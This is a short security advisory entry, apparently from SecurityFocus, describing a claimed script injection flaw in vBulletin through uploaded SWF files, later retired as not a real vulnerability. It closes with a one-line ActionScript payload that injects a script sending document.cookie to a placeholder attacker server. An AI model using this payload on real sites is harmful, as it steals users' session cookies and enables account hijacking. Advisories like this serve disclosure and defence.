source: https://www.securityfocus.com/bid/21736/info

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.

If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.

Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

This BID is being retired because further information shows that the application is not vulnerable to this issue.

getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie;blab();");